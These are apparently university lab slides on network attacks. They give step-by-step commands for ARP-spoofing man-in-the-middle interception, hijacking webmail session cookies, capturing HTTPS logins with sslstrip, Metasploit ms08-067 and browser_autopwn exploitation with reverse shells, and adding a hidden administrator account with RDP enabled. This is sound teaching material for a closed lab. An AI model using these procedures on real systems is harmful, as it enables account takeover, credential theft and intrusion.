Cybernetics and Economic Informatics Faculty Information Security Master

Computer Networks SecurityLaboratory Topic: Network Attacks

Adrian Furtun MSc, C|EH adif2k8@gmail.com

With great power comes great responsibility

Agenda1. Interception of network traffic transmitted using a clear-text protocol (HTTP)=> obtaining session cookies => using session cookies to enter a victims web session

2. 3. 4. 5. 6.

Interception of network traffic transmitted using an encrypted protocol (HTTPS)=> obtaining username and password for web login

Scanning the Windows VM using nmap (+Snort disabled/enabled) Scanning the Windows VM using Nessus (+Snort disabled/enabled) Gaining access to the Windows VM by exploiting a network service vulnerability Gaining access to a Windows machine with a client-side attack:=> social engineering => exploit browser vulnerability => use Metasploit to own the machine

Network Attacks

2

RulesIt is forbidden:Any scanning / attack outside laboratory network Any scanning / attack against your colleagues machines or against instructors machine

Breaking these rules might lead to severe penaltiesNetwork Attacks 3

Administrative tasksConnect to ftp://stud@my.laptop.ipusername: stud password: stud

Download:Course slides VMWare Player: VMware-player-3.1.3.exe Windows VM: winxpsp2_web_snort.zip Backtrack VM: bt4-final-vm.zip

Install VMWare Player Unzip both virtual machinesNetwork Attacks 4

Virtual machine configuration

Network Attacks

5

Laboratory setup (1)You will work in pairs (1 pair = 2 distinct computers): attacker and victim Victim machine = host machine Attacker machine = Backtrack VMStart Backtrack [ username: root, password: toor ] Open graphic mode: startx& Set network card in mode bridge ! Obtain IP address: dhclient eth0

Network Attacks

6

Laboratory setup (2)

Network Attacks

7

Exercise 1Obtain the session cookies of a victim from the local network and use them to enter his Yahoo mail accountThe victim needs a valid Yahoo mail account (a test account) The victim will open a web mail session The attacker1. Becomes MITM 2. Captures network traffic of the victim and extracts the necessary dataNetwork Attacks 8

Exercise 1 cont.Attacker machine: Become MITM and intercept all traffic sent by victim to the Gateway. View the traffic using Wireshark.1. 2.

Find the IP addresses of Victim and Gateway Activate the routing process in Backtrackecho 1 > /proc/sys/net/ipv4/ip_forward

3.

Inform the Victim that the Gateways MAC address is your MAC address attacker. (ARP poisoning using ARP replies)arpspoof i eth0 t IP_Victim IP_Gateway

4.

View the network traffic of Victim using WiresharkNetwork Attacks 9

Exercise 1 cont.1. Find the session cookies of Victim and use them to enter his email session Wireshark -> Follow TCP stream on a TCP packet sent by Victim:

2. 3. 4. 5. 6.

Copy the cookies Y and T in a text file Install the Firefox plugin AddNEdit Cookies Open an Yahoo mail session of your own (attacker) Use the plugin to edit your cookies and replace Y and T with the ones of the Victim Refresh the web pageNetwork Attacks

10

Exercise 2Intercept network traffic during a HTTPS session. Find the username and password of the Victim.1. 2.

Make yourself MITM (see exercise 1) Start SSLSTRIP and make it listen on port 1234sslstrip l 1234 s w traffic.log More details here: http://www.thoughtcrime.org/software/sslstrip/

3.

Configure IPTABLES to redirect HTTP traffic to SSLSTRIPiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234

4. 5.

The victim accesses a web site using HTTPS (ex. Yahoo login) Extract the useful information from file traffic.log

Network Attacks

11

About Snort

http://www.snort.org/assets/166/snort_manual.pdf

Netwok-based IDS Open source (free) Sourcefire commercial version (appliance)http://www.sourcefire.com/

Portable (Linux, Windows, MacOS X, Solaris, BSD, HP-UX, etc) Multiple mechanisms for intrusion detectionSignatures (rules): www.bleedingsnort.com Statistic anomalies Protocol anomalies

Network Attacks

12

About Snort cont.Snort running modes: Sniffer mode (like tcpdump) snort.exe -v d -e Packet logger Snort Packet Stream Sniffing Packet Decoder Preprocessor (Plug-ins) Detection Engine (Plug-ins) Output Stage (Plug-ins) Data Flow snort.exe vde log ..\log NIDS snort.exe d log ..\log c ..\etc\snort.conf

Alerts/Logs

Network Attacks

13

Nmap briefingsTCP connect() scan: TCP SYN scan: TCP UDP scan: Ping scan: nmap sT nmap sS nmap sU nmap sP

TCP FIN / Xmas Tree / Null scan: nmap sF/sX/sN Version Detection: OS Fingerprinting: nmap sS -sV nmap sS -O

Example $ nmap -sS -sV -O -F -n 192.168.1.1Network Attacks 14

Change setupStart the Windows VM New attack direction:Backtrack Windows VM

Network Attacks

15

Exercise 3Using nmap, scan the whole subnet of the victim machine (connected to vmnet8).Obtain the following information (from a single scan): Live hosts Open TCP ports Service version Operating system - Save all output in a text file

Hints:nmap h man nmap

Network Attacks

16

Exercise 3 cont.Check if the scanning can be detected by a NIDS (Snort)Authenticate to Windows VM (password: user) Start Snort cmd.exe -> cd c:\snort\bin snort.exe d l ..\log c ..\etc\snort.conf A console

Perform the scanning again using Nmap Any alert? (see c:\Snort\log\alert.ids)

Network Attacks

17

Exercise 4Scan the victim machine using Nessus to find vulnerabilities1. First install Nessus on BackTrack: Download Nessus (for Ubuntu 9.10 32 bit) dpkg i Nessus-4.4.1-ubuntu910_i386.deb

http://www.tenable.com

2. Then obtain a Nessus activation code (Home Feed) http://www.tenable.com/products/nessus/nessus-plugins/register-a-homefeed 3. Configure Nessus server Add a Nessus user: /opt/nessus/sbin/nessus-adduser Register Nessus and update plugins: /opt/nessus/bin/nessus-fetch --register CODE Start Nessus server: /etc/init.d/nessusd start 4. Start Nessus client:

https://127.0.0.1:8834Network Attacks 18

Exercise 4 cont.Sample vulnerability:1. 2. 3. 4.

Create a scan policy Select plugins Set target Run scan

Network Attacks

19

About MetasploitFramework for writing and executing exploits Modules Exploits Auxiliary Payloads Encoders Nops User interfaces: - console: msfconsole - GUI: Updates: msfgui

cd /pentest/exploits/framework3 svn update

Select Exploit -> Configure options + payload -> Run exploit -> Execute payloadTutorial: http://www.offensive-security.com/metasploit-unleashedNetwork Attacks 20

Exercise 5We will use Metasploit to exploit vulnerability ms08-067 and gain remote access to Victim machine cd /pentest/exploits/framework3 ./msfconsole help search ms08-067 use exploit/windows/smb/ms08_067_netapi show options show payloads set RHOST, LHOST, PAYLOAD, TARGET = 3, etc (for payload use windows/shell/reverse_tcp) 8. exploit 9. Execute windows commands in the obtained shell (ex. ipconfig, hostname)1. 2. 3. 4. 5. 6. 7. 8.Network Attacks 21

Exercise 5 cont.Obtain Remote Desktop access to Victim machine:Add a new user:

net user myuser mypassword /addAdd the new user in the local Administrators group:

net localgroup Administrators myuser /addStart the Remote Desktop service

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fCheck if the victim has open the port for Remote Desktop (use nmap) Connect to the victim machine using:

rdesktop 192.168.x.x &Network Attacks 22

What if?Victim has all ports closed (firewall) Operating system is patched Answer: Attack client applications and plugins(web browser, Acrobat Reader, MS Office, etc)

Network Attacks

23

Change setupStart the firewall of Windows VM Disable any exceptions Use nmap to verify that there are no more open ports

Network Attacks

24

Exercise 6Exploit browser vulnerability to gain remote acces. Use Metasploit and browser autopwn1. 2. 3. 4. 5. 6. 7.

cd /pentest/exploits/framework3 ./msfconsole use auxiliary/server/browser_autopwn set LHOST 192.168.x.x (attacker IP) set SRVPORT 80 set URIPATH mypictures.html exploitNetwork Attacks 25

Exercise 6 cont.Send victim an email containing the link: http://192.168.x.x/mypictures.html Victim clicks the link Attacker obtains meterpreter session

Network Attacks

26

Other useful toolsEttercap http://ettercap.sourceforge.net Cain&Abel http://www.oxid.it/cain.html The Middler http://inguardians.com/tools

Network Attacks

27

Q&A

?

Network Attacks

28